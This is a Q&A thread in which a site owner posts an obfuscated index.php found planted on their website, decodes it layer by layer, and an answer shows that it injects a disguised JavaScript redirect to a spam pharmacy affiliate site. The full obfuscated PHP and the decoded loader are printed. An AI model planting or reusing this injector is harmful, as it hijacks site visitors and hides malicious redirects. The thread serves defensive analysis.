dongyongyin5339
2014-06-27 21:01
浏览 80
已采纳

在网站上发现奇怪的index.php

I found a strange and obscured file "Index.php" at my website. I don't know who placed it at my page, but I would like to understand what it does.

The file has been obscured in the first place by replacing characters with hex values.

<?php /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>

I made a small tool that translated the script back to it's origination.

<?php /* copyright */ 

    ${"GLOBALS"}["kgnrwindbn"]="txt";
    $egeillbp="k";${"GLOBALS"}["ckmjcuie"]="v";

    foreach($_GET as${$egeillbp}=>${${"GLOBALS"}["ckmjcuie"]})
    {
        ${"GLOBALS"}["dxwqoalvaue"]="k";
        if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"GLOBALS"}["dxwqoalvaue"]}))
        {
            $xfgspywrt="k";
            $jdhbwek="txt";
            ${$jdhbwek} = base64_decode("PFNDUklQVCBsYW5ndWFnZT1qYXZhc2NyaXB0Pg0KPCEtLQ0KZnVuY3Rpb24gZ2V0bWUoc3RyKQ0KeyB2YXIgaWR4ID0gc3RyLmluZGV4T2YoJz8nKTsgaWYgKGlkeCA9PSAtMSkgcmV0dXJuIHN0cjsgdmFyIGxlbiA9IHN0ci5sZW5ndGg7IHZhciBuZXdfc3RyID0gIiI7IHZhciBpID0gMTsgZm9yICgrK2lkeDsgaWR4IDwgbGVuOyBpZHggKz0gMixpKyspDQp7IHZhciBjaCA9IHBhcnNlSW50KHN0ci5zdWJzdHIoaWR4LCAyKSwgMTYpOyBuZXdfc3RyICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGNoICsgaSkgJSAyNTYpOyB9IA0KZG9jdW1lbnQud3JpdGUobmV3X3N0ci5zdWJzdHIoMCxuZXdfc3RyLmxlbmd0aC0xMSkrIlx1MDAyNlx1MDA2N1x1MDA2Rlx1MDA2Qlx1MDA2Qlx1MDAzRFpaWlpcdTAwMjJcdTAwM0JcdTAwM0NcdTAwMkZcdTAwNzNcdTAwNjNcdTAwNzJcdTAwNjlcdTAwNzBcdTAwNzRcdTAwM0UiKTsNCn0NCmdvb2dsZV9hZF9jbGllbnQgPSAicHViLTE0MzA1ODQ0MDgzMTM4NDMiOw0KZ29vZ2xlX2FkX3dpZHRoID0gNzI4Ow0KZ29vZ2xlX2FkX2hlaWdodCA9IDkwOw0KZ29vZ2xlX2FkX2Zvcm1hdCA9ICI3Mjh4OTBfYXMiOw0KZ29vZ2xlX2FkX3R5cGUgPSAidGV4dF9pbWFnZSI7DQpnb29nbGVfYWRfY2hhbm5lbCA9ICIiOw0KZ2V0bWUoImh0dHA6Ly9wYWdlYWQyLmdvb2dsZXN5bmRpY2F0aW9uLmNvbS9wYWdlYWQvc2hvd19hZHMuanM/M0I3MTYwNkU2NDZBNkQxODYzNTc2MzVCNjg1MzU4NTUyQzEwNTc0RDYxNEI1QzRCNTk0RjU1NTgwNTIwNTg0OTRENDI0QzUzMDk0NjQ4M0IzODRBM0U0MzQxMEZGMzM4NDM0MjNEMDZGQUY5RkVGNkY4RjZGNkYyRjRGNkY3RUVGMEY1RjFFQjJEMkNFNzI4MUYyNkY0MTUxOTE4RUVFN0RGREZERkQyMUUxRjBCRTVEQURBRDVENUM1RERERENGMTIwMTBGMDUwQjBFRDciKTsNCi8vLS0+IDwvU0NSSVBUPg==");
            echo str_replace("ZZZZ",${$xfgspywrt},${${"GLOBALS"}["kgnrwindbn"]});
            exit;
        } 
    }
/* copyright */ ?>

But still this wasn't really helpfull, because of the base64 Decoding inside. The Content that has been decoded looks like:

<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } 
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
//--> </SCRIPT>

And still the Unicode part has also been encoded. This is the result of Decoding the Unicode part.

&gokk=ZZZZ";</script>

Now I know the content, but still can't figure out what it does. (and I don't want to try a script that I don't know).

My guess is that it tries to call google adds in a loop. But would that make sense - because google will block duplicated Ip addresses.

Has anyone seen those scripts at your website too? Or do you have an idea what the script does? Thank you for all suggestions.

  • 写回答
  • 好问题 提建议
  • 关注问题
  • 收藏
  • 邀请回答

1条回答 默认 最新

  • duanju7199 2014-06-27 21:14
    已采纳

    After doing a bit of sleuthing, it appears that this script is trying to redirect any hits on wherever index.php is to a pharmaceutical site of dubious intent. All the Google stuff is a cleverly implemented way to hide a URL redirect in JavaScript.

    First, replacing document.write with console.log:

    function getme(str) {
        var idx = str.indexOf('?');
        if (idx == -1) return str;
        var len = str.length;
        var new_str = "";
        var i = 1;
        for (++idx; idx < len; idx += 2, i++) {
            var ch = parseInt(str.substr(idx, 2), 16);
            new_str += String.fromCharCode((ch + i) % 256);
        }
        console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
    }
    
    getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
    

    We get this:

    <script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>
    

    re.da.ct.ed being an IP address. The function getme() simply parses the slug appended to the Google URL (which is a red herring).

    Doing a cURL request for headers on the decoded URL, we get this:

    $ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ' -I
    HTTP/1.1 302 Found
    Date: Fri, 27 Jun 2014 21:07:39 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.4-14+deb7u5
    Location: https://www.sleazydrugstore.net
    Vary: Accept-Encoding
    Content-Type: text/html
    

    Looks like it does nothing more than redirect visitors to a sleazy looking drug store, although there might be something more malicious hidden in there.

    I'm not sure whether to post the real URLs and IPs here, so some guidance would be appreciated.

    已采纳该答案
    评论
    解决 无用
    打赏 举报

相关推荐 更多相似问题